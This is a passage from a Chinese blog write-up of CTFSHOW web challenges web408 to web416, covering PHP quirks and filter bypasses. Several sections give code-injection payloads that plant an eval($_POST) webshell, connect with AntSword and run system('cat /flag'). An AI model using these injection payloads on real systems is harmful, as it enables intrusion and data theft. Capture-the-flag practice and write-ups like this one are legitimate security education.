<li><code>@</code> 后面的部分是邮箱域名，必须包含有效的域名格式，比如 <code>example.com</code>，包含至少一个点号 (<code>.</code>)，并且顶级域名部分也要正确</li>
<li>避免使用不合法或不允许的特殊字符</li>
<li>验证邮箱的整体格式符合国际标准，不过不验证邮箱是否真实存在</li>
</ul>
<p>然后<code>file_put_contents</code>格式为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">file_put_contents(string $filename, mixed $data [, int $flags = 0 [, resource $context]])</span><br></pre></td></tr></table></figure>

<ul>
<li><code>$filename</code>：要写入的文件路径和名称，如果文件不存在，则会自动创建</li>
<li><code>$data</code>：写入文件的数据，可以是字符串、数组或者流资源</li>
<li><code>$flags</code>（可选）：<ul>
<li><code>FILE_APPEND</code>：将数据追加到文件末尾，而不是覆盖</li>
<li><code>LOCK_EX</code>：写入时给文件加独占锁，以防止其他进程同时写入导致数据混乱</li>
<li><code>FILE_USE_INCLUDE_PATH</code>：在包含路径中搜索文件</li>
</ul>
</li>
<li><code>$context</code>（可选）：用于修改资源流的行为</li>
</ul>
<p>可以把非法字符放在双引号里绕过email@的前缀限制，因此payload为</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?email=&quot;&lt;?=eval($_POST[1]);?&gt;&quot;@1.php</span><br></pre></td></tr></table></figure>

<p>然后蚁剑连接</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820211220264.png"></p>
<p>在根目录找到flag</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820211245618.png"></p>
<h3 id="web409"><a href="#web409" class="headerlink" title="web409"></a>web409</h3><p>先看代码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820213147394.png"></p>
<p>会过滤掉任意字符后的flag，这题我们可以通过闭合PHP代码来做</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?email=&quot;flageval($_POST[1]);?&gt;&quot;@1.com</span><br></pre></td></tr></table></figure>

<p>通过在前面加上<code>flag</code>来触发<code>$email=preg_replace(&#39;/.flag/&#39;, &#39;&#39;, $email);</code>这一行代码，会删掉前面的<code>&quot;flag</code>，接着<code>?&gt;</code>闭合代码</p>
<p>然后POST传参执行命令即可</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1=system(&#x27;ls /&#x27;);</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250820223536813.png"></p>
<p>读取flag即可</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1=system(&#x27;cat /flag&#x27;);</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250820223953048.png"></p>
<h3 id="web410"><a href="#web410" class="headerlink" title="web410"></a>web410</h3><p>先看代码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820230748593.png"></p>
<p>这次是通过布尔判断输入的b是否是”1“</p>
<p>根据PHP文档，<code>FILTER_VALIDATE_BOOLEAN</code> 会把下列字符串（不区分大小写）视为<strong>true</strong>：</p>
<ul>
<li><code>&quot;1&quot;</code></li>
<li><code>&quot;true&quot;</code></li>
<li><code>&quot;on&quot;</code></li>
<li><code>&quot;yes&quot;</code></li>
</ul>
<p>以下对应的字符串（不区分大小写）视为<strong>false</strong>：</p>
<ul>
<li><code>&quot;0&quot;</code></li>
<li><code>&quot;false&quot;</code></li>
<li><code>&quot;off&quot;</code></li>
<li><code>&quot;no&quot;</code></li>
<li><code>&quot;&quot;</code>（空字符串）</li>
</ul>
<p>然后题目过滤了大于0的数字和true字符串，那我们传入on和yes都可以，大小写都行</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?b=yes</span><br></pre></td></tr></table></figure>

<p>或者</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?b=on</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250820231040237.png"></p>
<h3 id="web411"><a href="#web411" class="headerlink" title="web411"></a>web411</h3><p>先看代码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820234813468.png"></p>
<p>跟上题一样，不过这次把on的大小写过滤了，我们用yes或TRUE等都可以，太多方法可以绕过了</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?b=yes</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250820235040393.png"></p>
<h3 id="web412"><a href="#web412" class="headerlink" title="web412"></a>web412</h3><p>先看代码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250820235321932.png"></p>
<p>这次是POST传参ctfshow，然后添加到<code>flag.php</code>末尾，同时前面还有个注释符<code>//</code></p>
<p>用<code>%0a</code>换行即可</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ctfshow=%0aeval($_POST[1]);</span><br></pre></td></tr></table></figure>

<p>然后蚁剑连接webshell</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250821000718225.png"></p>
<p>在<code>flag.php</code>找到flag</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250821000748134.png"></p>
<h3 id="web413"><a href="#web413" class="headerlink" title="web413"></a>web413</h3><p>这题相比上一题，注释的方式改了</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250821001112335.png"></p>
<p>ctfshow变量被包含在多行注释符<code>/**/</code>里面了</p>
<p>只需前后加个注释符即可</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ctfshow=*/eval($_POST[1]);/*</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250821001622283.png"></p>
<p>然后跟上题一样，蚁剑连接webshell，在<code>flag.php</code>找到flag</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250821001650368.png"></p>
<h3 id="web414"><a href="#web414" class="headerlink" title="web414"></a>web414</h3><p>先看代码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250821002329949.png"></p>
<p>我们简单分析一下代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if ($ctfshow == true)</span><br></pre></td></tr></table></figure>

<p>判断变量<code>$ctfshow</code>是否等于<code>true</code>，只有在<code>$ctfshow</code>为真时，才会执行内部判断</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqrt($ctfshow) &gt;= sqrt(intval($flag))</span><br></pre></td></tr></table></figure>

<ul>
<li><code>sqrt()</code>是取平方根函数</li>
<li><code>intval($flag)</code>将<code>$flag</code>转换为整数</li>
<li>判断<code>$ctfshow</code>的平方根是否大于等于<code>$flag</code>整数值的平方根</li>
</ul>
<p>只有当<code>$ctfshow</code>的平方根小于<code>$flag</code>整数的平方根时，才会显示flag</p>
<p>然后我们再来分析<strong>一般情况</strong>下布尔判断条件</p>
<p><strong>被视为 false 的值：</strong></p>
<ul>
<li>布尔 <code>false</code></li>
<li>整数 0</li>
<li>浮点数 0.0</li>
<li>空字符串 <code>&quot;&quot;</code>（包含字符串 “0”）</li>
<li>字符串 <code>&quot;0&quot;</code></li>
<li>空数组 <code>[]</code></li>
<li><code>NULL</code></li>
</ul>
<p><strong>被视为 true 的值：</strong></p>
<ul>
<li>任意非零数字，例如<code>1</code>、<code>-1</code>、<code>3.14</code></li>
<li>非空字符串，且不等于 <code>&quot;0&quot;</code>，如 <code>&quot;false&quot;</code>、<code>&quot;off&quot;</code>、<code>&quot;hello&quot;</code> 等都会被认为是真</li>
<li>非空数组</li>
<li>资源类型</li>
<li>对象</li>
</ul>
<p>因此这题我们只要传入<strong>非零负数</strong>即可成功通过验证</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?ctfshow=-1</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250821003042661.png"></p>
<h3 id="web415"><a href="#web415" class="headerlink" title="web415"></a>web415</h3><p>先看代码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250821003515914.png"></p>
<p>在PHP中，<strong>函数名是不区分大小写的</strong>，这意味着定义函数时用的名字，如<code>getflag()</code>，在调用时可以写成<code>getflag()</code>、<code>GetFlag()</code>、<code>GETFLAG()</code>等，都会被正确识别并调用</p>
<p>不过需要注意的是，虽然函数名调用不区分大小写，但<strong>变量名是区分大小写的</strong></p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?k=getFlag</span><br></pre></td></tr></table></figure>

<p>然后源代码查看flag即可</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250821003727390.png"></p>
<h3 id="web416"><a href="#web416" class="headerlink" title="web416"></a>web416</h3><p>先看代码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250821004434525.png"></p>
<p>我们要调用的是ctf类中的flag方法，直接用<strong>双冒号操作符</strong>即可</p>
<p>补充解释一下，它主要用于：</p>
<ul>
<li>访问类的<strong>静态属性</strong>和<strong>静态方法</strong></li>
<li>访问类的常量</li>
<li>调用父类（<code>parent::</code>）、当前类（<code>self::</code>）、或静态绑定类（<code>static::</code>）的成员</li>
</ul>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?f=ctf::flag</span><br></pre></td></tr></table></figure>

<p>然后源代码查看flag即可</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250821004647785.png"></p>
</div><div class="article-licensing box"><div class="licensing-title"><p>CTFSHOW | 其他篇题解（一）web396 - web416</p><p><a href="https://waynejoon.github.io/posts/ctfshow-others-1-web396-web416/">https://waynejoon.github.io/posts/ctfshow-others-1-web396-web416/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><p>WayneJoon.H</p></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2025-08-21</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="level is-mobile is-flex"><div class="article-tags is-size-7 is-uppercase"><i class="fas fa-tags has-text-grey"></i> <a class="link-muted" rel="tag" href="/tags/CTFSHOW/">CTFSHOW </a></div></div><!--!--></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/posts/ctfshow-others-2-web417-web437/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">CTFSHOW | 其他篇题解（二）web417 - web437</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/posts/Xuanji-CTF-SSH-Log-Analysis/"><span class="level-item">玄机靶场 | 日志分析-ssh日志分析</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--></div><div class="column column-left is-4-tablet is-4-desktop is-3-widescreen  order-1"><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar is-rounded" src="/img/waynejoon.jpg" alt="WayneJoon.H"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">WayneJoon.H</p><p class="is-size-6 is-block">记录学习生活</p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">文章</p><a href="/archives/"><p class="title">33</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">分类</p><a href="/categories/"><p class="title">6</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">标签</p><a href="/tags/"><p class="title">7</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/waynejoon" target="_blank" rel="me noopener">关注我</a></div><div class="level is-mobile is-multiline"><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="Github" href="https://github.com/waynejoon"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="me noopener" title="RSS" href="/atom.xml"><i class="fas fa-rss"></i></a></div></div></div><div class="card widget" id="toc" data-type="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">目录</h3><ul class="menu-list"><li><a class="level is-mobile" href="#前言"><span class="level-left"><span class="level-item">1</span><span class="level-item">前言</span></span></a></li><li><a class="level is-mobile" href="#题目列表"><span class="level-left"><span class="level-item">2</span><span class="level-item">题目列表</span></span></a><ul class="menu-list"><li><a class="level is-mobile" href="#web396"><span class="level-left"><span class="level-item">2.1</span><span class="level-item">web396</span></span></a></li><li><a class="level is-mobile" href="#web397"><span class="level-left"><span class="level-item">2.2</span><span class="level-item">web397</span></span></a></li><li><a class="level is-mobile" href="#web398"><span class="level-left"><span class="level-item">2.3</span><span class="level-item">web398</span></span></a></li><li><a class="level is-mobile" href="#web399"><span class="level-left"><span class="level-item">2.4</span><span class="level-item">web399</span></span></a></li><li><a class="level is-mobile" href="#web400"><span class="level-left"><span class="level-item">2.5</span><span class="level-item">web400</span></span></a></li><li><a class="level is-mobile" href="#web401"><span class="level-left"><span class="level-item">2.6</span><span class="level-item">web401</span></span></a></li><li><a class="level is-mobile" href="#web402"><span class="level-left"><span class="level-item">2.7</span><span class="level-item">web402</span></span></a></li><li><a class="level is-mobile" href="#web403"><span class="level-left"><span class="level-item">2.8</span><span class="level-item">web403</span></span></a></li><li><a class="level is-mobile" href="#web404"><span class="level-left"><span class="level-item">2.9</span><span class="level-item">web404</span></span></a></li><li><a class="level is-mobile" href="#web405"><span class="level-left"><span class="level-item">2.10</span><span class="level-item">web405</span></span></a></li><li><a class="level is-mobile" href="#web406"><span class="level-left"><span class="level-item">2.11</span><span class="level-item">web406</span></span></a></li><li><a class="level is-mobile" href="#web407"><span class="level-left"><span class="level-item">2.12</span><span class="level-item">web407</span></span></a></li><li><a class="level is-mobile" href="#web408"><span class="level-left"><span class="level-item">2.13</span><span class="level-item">web408</span></span></a></li><li><a class="level is-mobile" href="#web409"><span class="level-left"><span class="level-item">2.14</span><span class="level-item">web409</span></span></a></li><li><a class="level is-mobile" href="#web410"><span class="level-left"><span class="level-item">2.15</span><span class="level-item">web410</span></span></a></li><li><a class="level is-mobile" href="#web411"><span class="level-left"><span class="level-item">2.16</span><span class="level-item">web411</span></span></a></li><li><a class="level is-mobile" href="#web412"><span class="level-left"><span class="level-item">2.17</span><span class="level-item">web412</span></span></a></li><li><a class="level is-mobile" href="#web413"><span class="level-left"><span class="level-item">2.18</span><span class="level-item">web413</span></span></a></li><li><a class="level is-mobile" href="#web414"><span class="level-left"><span class="level-item">2.19</span><span class="level-item">web414</span></span></a></li><li><a class="level is-mobile" href="#web415"><span class="level-left"><span class="level-item">2.20</span><span class="level-item">web415</span></span></a></li><li><a class="level is-mobile" href="#web416"><span class="level-left"><span class="level-item">2.21</span><span class="level-item">web416</span></span></a></li></ul></li></ul></div></div><style>#toc .menu-list > li > a.is-active + .menu-list { display: block; }#toc .menu-list > li > a + .menu-list { display: none; }</style><script src="/js/toc.js" defer></script></div></div><!--!--></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/">WayneJH</a><p class="is-size-7"><span>&copy; 2025 WayneJoon.H</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a><br><span id="busuanzi_container_site_uv">共<span id="busuanzi_value_site_uv">0</span>个访客</span></p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="GitHub" href="https://github.com/waynejoon"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("zh-cn");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script data-pjax src="/js/column.js"></script><script data-pjax src="/js/busuanzi-fix.js" defer></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script data-pjax src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/pjax@0.2.8/pjax.min.js"></script><script src="/js/pjax.js"></script><!--!--><!--!--><!--!--><script data-pjax src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script data-pjax src="/js/insight.js" defer></script><script data-pjax>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script></body></html>